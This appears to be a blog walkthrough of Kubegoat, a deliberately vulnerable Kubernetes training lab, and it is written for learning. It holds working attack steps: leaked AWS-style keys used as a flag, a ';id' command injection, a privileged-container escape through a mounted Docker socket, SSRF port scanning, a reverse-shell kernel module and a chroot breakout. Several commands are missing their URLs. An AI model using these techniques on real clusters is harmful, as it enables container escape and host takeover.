Installing and Solving Kubegoat in a Kubernetes Cluster Running on VMs

5 min read · Sep 3, 2023

Welcome to this blog post on “Installing Kubegoat in a Kubernetes cluster running on VMs.” In this post, we will walk through the steps of installing Kubegoat, a tool designed to simulate real-world Kubernetes cluster misconfigurations and vulnerabilities, in a Kubernetes cluster running on virtual machines.

In addition to installing Kubegoat in a Kubernetes cluster running on VMs, we will also go through and solve each module of Kubegoat. This will provide a hands-on learning experience and help us understand how to identify and fix common misconfigurations and vulnerabilities in a Kubernetes cluster.

In a previous blog post, we discussed how to deploy a Kubernetes cluster. If you haven’t already, I recommend reading that post first to get a better understanding of the basics of setting up a Kubernetes cluster. With that knowledge in hand, we can now move on to installing Kubegoat and exploring its capabilities.


Prerequisite: The Kubernetes cluster should be up and running.

1. Cloning the kube-goat project.
git clone

2. Installing Helm.

curl | bash

3. Setting up kubegoat.


4. Exposing kubegoat.


Scenario 1: Sensitive keys in codebases
dirsearch -u
./ test
git log -p
#First Flag

aws_access_key_id = AKIVSHD6243H22G1KIDC
aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M
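Hunting for credentials in `git log -p` output can be automated with a simple regex scan, which is essentially what secret-scanning tools do. The patterns below are a minimal sketch: the access-key regex assumes the 20-character `AKI…` format of the flag above, and the secret-key pattern assumes a 40-character value, so treat both as illustrative rather than exhaustive.

```python
import re

# AWS-style access key IDs: 20 uppercase alphanumerics starting with "AKI".
ACCESS_KEY_RE = re.compile(r"\bAKI[A-Z0-9]{17}\b")
# Loose pattern for a 40-character secret assigned to aws_secret_access_key.
SECRET_KEY_RE = re.compile(r"(?i)aws_secret_access_key\s*=\s*([A-Za-z0-9/+]{40})")

def find_aws_keys(text: str):
    """Scan a blob of text (e.g. `git log -p` output) for AWS-style keys."""
    return ACCESS_KEY_RE.findall(text), [m.group(1) for m in SECRET_KEY_RE.finditer(text)]

# Example: the diff hunk recovered from the repository's history.
diff = """
+aws_access_key_id = AKIVSHD6243H22G1KIDC
+aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M
"""
ids, secrets = find_aws_keys(diff)
print(ids, secrets)
```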

Scenario 2: DIND (docker-in-docker)

a. Command injection

# Command injection in the ping functionality: append ";id" to the input
;id
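To see why appending `;id` works, here is a minimal, hypothetical recreation of the bug class: user input concatenated straight into a shell command line. This is not Kubegoat's actual code, just a sketch of the vulnerable pattern.

```python
import subprocess

def vulnerable_ping(host: str) -> str:
    # BUG (intentional): user input is interpolated directly into a shell
    # command, so shell metacharacters such as ';' are honored.
    return subprocess.run(
        f"ping -c 1 {host}",
        shell=True, capture_output=True, text=True,
    ).stdout

# "127.0.0.1;id" makes the shell run ping AND the injected `id` command.
output = vulnerable_ping("127.0.0.1;id")
print(output)  # the output contains the uid=... line from `id`
```

The fix is equally simple: pass the arguments as a list (`subprocess.run(["ping", "-c", "1", host])`) so no shell ever parses the input.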

b. Finding the mounted Docker socket:

;find / -name docker.sock

c. Installing the static binary for the Docker CLI:

curl -OL
;ls -al docker-24.0.5.tgz
;tar -xvf docker-24.0.5.tgz
#Extracting takes around 5 min, so be patient

d. Spinning up a new container with the host's file system mounted and the --privileged flag:

; /docker/docker -H unix:///custom/docker/docker.sock pull ubuntu
; /docker/docker -H unix:///custom/docker/docker.sock run -it --privileged -v /:/host_fs/ ubuntu bash

Note: In this challenge, the host is itself a Docker container.

Scenario 3: SSRF in the Kubernetes (K8S) world

a. Finding and confirming the SSRF vulnerability.

b. TCP Port scanning via SSRF:

We found that port 5000 is running a web server whose HTTP response says to refer to the metadata.db endpoint.

c. We found a secret via this metadata.db endpoint.
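The port-scanning step can be sketched as a loop over candidate ports, where each probe is issued *by the vulnerable server* through the SSRF parameter. The `fetch` callable below is an assumption standing in for however the SSRF is actually triggered (e.g. a URL parameter); the fake version simulates what we observed, with only port 5000 answering.

```python
from typing import Callable, Dict, Iterable

def scan_ports_via_ssrf(fetch: Callable[[str], str], host: str,
                        ports: Iterable[int]) -> Dict[int, str]:
    """Probe internal ports through an SSRF primitive.

    `fetch(url)` is assumed to make the vulnerable server request the URL
    and return the response body, raising on connection failure.
    """
    results = {}
    for port in ports:
        try:
            body = fetch(f"http://{host}:{port}/")
            results[port] = body[:80]  # keep a snippet as evidence
        except Exception:
            pass  # closed/filtered ports fail or time out
    return results

# Stand-in fetch simulating the behaviour we saw: only port 5000 answers.
def fake_fetch(url: str) -> str:
    if ":5000/" in url:
        return "See the metadata.db endpoint"
    raise ConnectionError(url)

print(scan_ports_via_ssrf(fake_fetch, "127.0.0.1", range(4998, 5003)))
```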



Scenario 4: Container escape to the host system (CAP_SYS_MODULE: loading kernel modules, and CAP_SYS_CHROOT: chroot)

a. We start from a shell within a container.

b. Checking Linux capabilities:

capsh --decode=`/bin/sh -c 'cat /proc/1/status' | grep -i 'CapEff' | awk '{print $2}'`

c. There are several capabilities here that can be abused. Let’s use CAP_SYS_MODULE to load our malicious kernel module.
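What `capsh --decode` is doing above is expanding the CapEff value, a hex bitmask from /proc/&lt;pid&gt;/status, into capability names. A minimal decoder for a few capabilities relevant to this scenario (bit numbers taken from linux/capability.h; the full table is much longer):

```python
# Bit numbers from linux/capability.h (subset relevant to this scenario).
CAPS = {
    13: "cap_net_raw",
    16: "cap_sys_module",
    18: "cap_sys_chroot",
    21: "cap_sys_admin",
}

def decode_capeff(hex_mask: str):
    """Decode a CapEff hex mask into capability names, the way
    `capsh --decode` does, for the subset listed in CAPS."""
    mask = int(hex_mask, 16)
    return [name for bit, name in sorted(CAPS.items()) if mask >> bit & 1]

# Example: a mask with CAP_SYS_MODULE (bit 16) and CAP_SYS_CHROOT (bit 18) set.
print(decode_capeff(hex((1 << 16) | (1 << 18))))  # ['cap_sys_module', 'cap_sys_chroot']
```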

d. Finding the IP address of container:

e. Kernel Module:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
#include <linux/init.h>

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Shorter reverse shell LKM");

//msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4443 -f c
static char shellcode[] = ""; /* paste the msfvenom -f c output here */

typedef void (*sc)(void);

static int __init reverse_shell_init(void) {
    sc code = (sc)shellcode;
    code(); /* jump into the shellcode */
    return 0;
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

f. Makefile:

obj-m += reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

g. Compiling the kernel module and transferring it to the container:

cd /lib/modules && wget

h. We were unable to load the kernel module, as the insmod tool is not available in the container; our attempts to install it also failed.

insmod reverse-shell.ko

i. If we check the root directory, we find that the host’s file system is mounted at /host-system, and that our container has the CAP_SYS_CHROOT capability.


j. There is a simple container breakout abusing these two facts: with CAP_SYS_CHROOT and the host’s file system mounted, we can chroot into it (e.g. chroot /host-system /bin/bash) and get a shell in the host’s root.

Note: As a sanity check, we ran the ip a command, which is not available inside the container but is available on the host.

To be continued….

Thanks for reading!